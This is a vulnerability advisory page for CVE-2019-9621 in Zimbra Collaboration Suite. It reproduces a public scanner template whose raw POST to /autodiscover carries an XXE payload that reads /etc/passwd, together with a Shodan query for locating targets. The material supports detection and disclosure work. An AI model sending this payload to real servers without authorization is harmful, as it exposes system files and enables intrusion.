CVE-2019-9621: Zimbra Collaboration Suite - SSRF

Date: 2025-08-01 | Affected software: Zimbra Collaboration Suite | PoC: public

Vulnerability description

Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows SSRF via the ProxyServlet component.

PoC code [public]

id: CVE-2019-9621

info:
  name: Zimbra Collaboration Suite - SSRF
  author: riteshs4hu
  severity: high
  description: |
    Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows SSRF via the ProxyServlet component.
  reference:
    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/zimbra_xxe_rce.rb
    - https://nvd.nist.gov/vuln/detail/cve-2019-9621
    - http://packetstormsecurity.com/files/153190/Zimbra-XML-Injection-Server-Side-Request-Forgery.html
    - https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html
    - https://bugzilla.zimbra.com/show_bug.cgi?id=109127
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-9621
    cwe-id: CWE-918
    epss-score: 0.91807
    epss-percentile: 0.99663
    cpe: cpe:2.3:a:zimbra:collaboration_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: zimbra
    product: collaboration_server
    shodan-query: html:"Zimbra Collaboration Suite Web Client"
  tags: cve,cve2019,zimbra,collaboration-server,oast,oob,xxe,kev,vkev

http:
  - raw:
      - |
        POST /autodiscover HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0"?>
        <!DOCTYPE soap [
        <!ELEMENT soap ANY >
        <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
        <Autodiscover>
          <Request>
            <EMailAddress>test@example.com</EMailAddress>
            <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
          </Request>
        </Autodiscover>

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - contains(body, "response schema")
          - contains(header, "text/html")
        condition: and
# digest: 4a0a00473045022100f8549b07f7b063f6ef7fa33f2d2339756f8ddb7fa79da40d567f5268bbadb698022028a3ac5d10d12235838c558b3147bb2b18992f3bc35ede0f4820eb1b99530978:922c64590222798bb761d5b6d8e72950
